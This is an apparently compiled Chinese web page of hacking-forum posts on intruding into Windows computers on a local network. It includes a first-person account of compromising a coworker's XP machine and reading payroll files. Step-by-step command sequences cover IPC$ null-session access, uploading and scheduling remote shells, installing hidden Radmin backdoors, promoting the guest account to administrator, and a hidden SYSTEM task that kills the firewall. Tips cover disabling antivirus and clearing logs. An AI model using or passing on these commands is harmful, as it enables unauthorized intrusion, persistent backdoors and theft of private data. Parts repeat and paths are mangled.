局域网入侵_求问局域网电脑入侵的问题

局域网入侵命令仅供参考
我先打开命令提示符 , 用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time<1ms TTL=128,说明对方没有防火墙,这样或许有可能入侵 。下一步,我使用了X-SCAN 3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它 。第二种方法就是如果对方有比较严重的漏洞,如RPC溢出 。这样的话,用溢出程序溢出它,然后再上传控制程序进行控制 。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球 。知道了它有这个漏洞,下一步就要找溢出程序,这让我忙活了好一阵时间,因为有的溢出程序对这台电脑好像无效 。这些工具的名称我都记不起来了,反正有好几个 。最后找到了一个溢出程序XP.EXE,这个程序终于溢出了那台电脑 。得到了个CMDSHELL 。这算是一个小小的胜利吧 。
得到了CMDSHELL,我该怎样给它上传控制程序呢?我想了一会儿,终于灵感来了,我和它在一个局域网,用共享上传最方便了 。于是打开网上邻居,查看工作组计算机,找到这台电脑 , 双击,进不去,提示信息我记不清了,据我分析可能是对方这台电脑没有运行网络安装向导,因为是XP系统,所以要用共享传输文件,必须要运行这个向导不可 , 运行这个向导作用就是配置一个本地安全策略,你可以打开“控制面板—管理工具—本地安全策略”,展开“本地策略”—“用户权利指派” 。在右边有一个安全策略—“拒绝从网络访问这台计算机” 。我想对方的电脑中相应的这条策略里,肯定设置有GUEST这个用户的,这就是为什么我打不开它的共享的原因,因为共享访问默认是以这个GEUST用户登录的 , 因为它的安全设置不允许GUEST从网络访问,所以我才访问不了它的共享 。因为XP 默认的共享模式是简单文件共享 。这与WIN2000系统不同,如果是WIN2000系统,你在知道管理员密码的情况下,可以用命令net use IPipc$ "密码" /user:用户名 建立与对方的ipc$连接,随之而来的就是copy 木马程序 ipd$这样的命令上传木马了 。XP就不能这样子了,你即使知道它的管理员密码用上面的命令与不能建立ipc$连接 。这就是为什么XP比2000系统安全的地方所在 。下面我要作的就是要修改XP的共享模式为2000的共享模式 。方法如下:在溢出获得的CMDSHELL下,键入命令:
echo Windows Registry Editor Version 5.00 >c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>c:123.reg
echo. >>c:123.reg
echo "forceguest"=dword:00000000 >>c:123.reg
regedit /e c:123.reg
等打完这几条命令后,对方XP的共享模式就已经与2000的相同了 。我来解释一下这几条命令的含意,echo Windows Registry Editor Version 5.00 >c:123.reg这条命令是将Windows Registry Editor Version 5.00这几个字符保存到c:123.reg文件里 。大家需要注意一下第一句的> 和后面几句的>>这是有区别的,>字符是覆盖式的 , >>是追加式的,第三句的echo. >>c:123.reg命令是追加一个空白行,这句挺重要 , 如果不加这句是不能成功的,你可以随便打开一个注册表文件看一下,格式就是这样的 , 第二行是空着的 。这一点一定要注意 。执行完前四条命令后就在对方C盘下生成一个123.reg文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五条命令是将这个REG文件导入到注册表中 。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了 。下一步 , 上传控制程序 。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装 。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg 内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服务端程序能够隐藏通知栏里的图标 , 我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的 。接着生成一个BAT文件,我命名为aaa.bat,内容如下:
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
这些命令是安装命令,设置连接端口为:2233 密码是:1 隐藏安装界面的方式安装 然后就是将aaa.reg导入注册表,启动r_server服务 。
准备工作作好后 , 就要上传文件了 , 一共需上传4个文件,aaa.reg aaa.bat r_server.exe admdll.dll 后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后 , 安装目录里就有这两个文件 。我先建立ipc$连接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成 。接着:
copy r_server 192.168.1.4admin$system32
copy aaa.bat 192.168.1.4admin$system32
copy aaa.reg 192.168.1.4admin$system32
copy admdll.dll 192.168.1.4admin$system32
然后再进入溢出得到的CMDSHELL下键入:
attrib +s +h +r c:windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s +h +r c:windowssystem32aaa.reg
这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现 。
下一步就是运行aaa.bat了 , 就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕 。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间 。
进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了 , 我在溢出的CMDSHELL 下不小心键入了命令EXIT , 结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令 shutdown -A就可以取消这个倒计时关机的界面 , 可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN 远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$ ,图标是个大红的花朵 。
下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自互联网上,岂不知黑客就在他眼皮底下 , 嘿嘿 。。。。那位高手又给被我控制了的电脑上安装了卡巴 , 原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了 。经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样 。我给它开放的ipc$功能 , 他也没发现 。也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下 。哈哈 。。。
接下来的工作对我来说就比较简单了,给它开telnet服务器 , 开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作 。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表 , 工资表之类的东西,这些对我来看没什么大的吸引力 。不过我看到了我们集团老总的工资,每月一万多块钱呢?。『煤诎?。。。这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中 。。。。
后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外,windows的补丁打上了 , 还装了强悍的卡巴,还是搞不定黑客?。」?nbsp;, 因为卡巴不是杀RADMIN的 。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了 。因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的 。有一次下午下班后我无意地ping 了一下这台电脑的IP,居然有返回 。说明对方防火墙关闭了,我马上用RADMIN连接,居然成功 。我晕 。。。原来对方只开了防火墙,并没有发现这个明显的后门 。我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的 。不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子 。看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现 , 这就给我创造了第二次入侵的机会 。他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙 , 那岂不是没得玩了 。哈哈 。。。我下面给出一个我自己研究出来的独门密方,保证百?。」?。。。。
我的方法是创建一个隐藏的计划任务 。让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用 。方法如下:先建一个批处理文件abc.bat , 放在c:windowssystem32目录下,内容如下:
net stop sharedaccess
当然也可以附加点别的 , 比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令:
taskkill /IM rfw.exe /f
如果想使共享模式是高级共享模式,可以再加上下面的命令:
regedit /e c:windowssystem32abc.reg
当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我说一下创建隐藏计划任务的方法:
在对方电脑的CMDSHELL下键入命令:
schtasks /create /tn "常驻" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c: windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大 。如果只有这样还不能达到隐藏的要求 , 你打开控制面板—任务计划,仍然可以发现它的存在 。好的,下面说说隐藏它的方法 。还是进入 CMDSHELL中 。键入命令attrib +h c:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了 。这只是表面消失,实际是它还是存在的 。你可以在CMDSHELL下键入命令:schtasks查看 。这样不管对方管理员怎样修改设置 , 每隔半小时就又会补修改回来 。它想摆脱我的控制可说是难上加难了 。哈哈 。。。
局域网简单入侵步骤事先 声明 , 本人不是黑客,不懂高深的计算机知识 。

三步骤:

一、到要入侵的电脑上(假设IP:192.168.0.100),右击我的电脑--远程--允许用户远程连接到此计算机打勾 。如果不懂得超级管理员权限,就去新建个帐户 。

二、在你自己的电脑上,打开cmd,输入:mstsc,跳出远程桌面 , 输入192.168.0.100 。进入之后 , 要求输入正确的用户名密码 , 你就把刚刚建的帐户输入,或者你本来就已经知道超级管理员的权限 , 也可以输入 。

三、进去之后,你可以写上某某到此一游 。或者直接点开始--关机 。于是......


如何能局域网入侵别人的计算机相关命令
建立空连接
net use [url= "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接
net use [url= "用户名" /user:"密码" (同样有3个空格)
映射默认共享
net use z: [url= "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: [url=
删除一个ipc$连接
net use [url= /del
删除共享映射
net use c: /del 删除映射的c盘 , 其他盘类推
net use * /del 删除全部,会有提示要求按y确认
经典入侵模式
1.C:\>net use [url= "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators , 密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成 。
2. C:\>copy srv.exe [url=
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了) 。
3.C:\>net time [url=
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成 。
4.C:\>at [url= 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵?。?
5.C:\>net time [url=
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令 。
6.C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧 , 注意端口是99 。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell 。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe [url=
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中) 。
8.C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行) 。当出现"DONE"的时候,就说明已经启动正常 。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:\>net user guest /active:yes
将对方的Guest用户激活
11.C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12.C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
ipc$与空连接,139,445端口,默认共享的关系
如何入侵局域网中的邻居家电脑那就不叫入侵?。?br />
方法:
-获悉对方IP地址
-DOS窗口输入 TRACERT (对方IP地址)
-DOS窗口输入 NBTSTAT -A(对方IP地址)
第一行是对方电脑名称
第二行是对方电脑所在工作组
第三行是对方电脑的说明
-将Windows目录下LMHOSTS.SAM-改名为LMHOSTS-删除内容-将对方的IP及电脑名按以下格式写入文件: (对方IP地址)电脑名
-DOS窗口输入 NBTSTAT -R
-开始-查找-电脑-输入对方电脑名
-出现对方电脑点击即可进入
或者可以利用一些端口进入!
局域网内网入侵我查拉135端口端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输 。
端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的 。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的 。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135 。
1:用139端口入侵
我们先确定一台存在139端口漏洞的主机 。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具 。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接 。
用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表 。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
<1>键入不带参数的net view显示当前域的计算机列表 。?
<2>\\computername 指定要查看其共享资源的计算机 。?
<3>/domain[:domainname]指定要查看其可用计算机的域?
NET USE?
作用:连接计算机或断开计算机与共享资源的连接 , 或显示计算机的连接信息 。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接 。?
devicename指定要连接到的资源名称或要断开的设备名称 。?
\\computername\sharename服务器及共享资源的名称 。?
password访问共享资源的密码 。?
*提示键入密码 。/user指定进行连接的另外一个用户 。?
domainname指定另一个域 。?
username指定登录的用户名 。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接 。?
/persistent控制永久网络连接的使用 。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C,D , E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样 。
2:4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3:80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入 。(啊D的注入软件) 。
4:serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵 。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限 。(servlocal.exe)
对serv-u的MD5加密密码 , 可以用字典暴破 。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
5: 554端口
用real554.exe入侵 。
6:6129端口
用DameWare6129.exe入侵 。
7. 6129端口
用DameWare6129.exe入侵 。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵 。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵 。(可用mydoomscan.exe查) 。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe) 。
经典IPC$入侵
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名
 , 输入administrators,命令即可成功完成 。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去 , 在流光的Tools目录下就有(这里的$是指admin用户的
c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了) 。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成 。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令 。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99 。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell 。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中) 。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行) 。当出现"DONE"的时候 , 就说明已经启动正常 。然后使
用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
各个端口的入侵.%20&k=5lala&aid=B0100019074
不算太复杂的!
求问局域网电脑入侵的问题【局域网入侵_求问局域网电脑入侵的问题】先申明:
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空) , 并且开了***端口,但没开防火墙的机子 。
入侵工具:
一般要用到三个:NTscan**扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒 , 建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀 。)
入侵步骤:
1.使用"NTscan**扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了 。
2.使用"Recton--D贺免杀专用版"
选择"CMD命令"项,在"CMD:"中输入"net share C$=C:\",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\\对方IP\C$",即可进入对方C盘 。
选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP , 远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \\***.***.***.***\IPC$" /user:administrator"在*处填入你入侵的主机IP 。
3.使用"DameWare迷你中文版 4.5" , 安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址 , 点"设置" , 在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选 , 在"用户选项"中去掉"启用用户选项菜单" 。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了 , 当然你也可以只选择监视对方屏幕 。注意:如果不注册的话 , 在对方主机上会弹出一个对话框,暴露你的身份 。
入侵步骤补充:
1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成 。
2.Recton-D贺免杀专用版还有其他功能 , 在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入\\IP\C$,进入对方C盘 , 你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉 。最后选"日志" , 清除所有日志 , 不留痕迹 。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉 。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成 , 首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del" 。
4.为方便下次入侵 , 可以设置后门,查看用户:"net user",激活guest用户
"net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add" 。
5.telnet命令(DOS命令)很多,可去网上查找它的命令 , 常用的有:查看D盘文件:""dir d:\",查看C盘program file文件夹:"dir c:\PROGRA~1\;",60秒倒记时关机:"shutdown -s -t 60"
补充说明:
1.net use错误原因解决:
(1)."发生系统错误 ***6 。登录失败: 未知的用户名或错误密码 。"
在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接 。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.
(2)"发生系统错误 ***7 。登陆失败:用户帐户** 。可能的原因包括不允许空密码 , 登陆时间** , 或强制的策略限 。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
(3)"//IP/c$"时提示找不到网络途径 。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性 , 进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".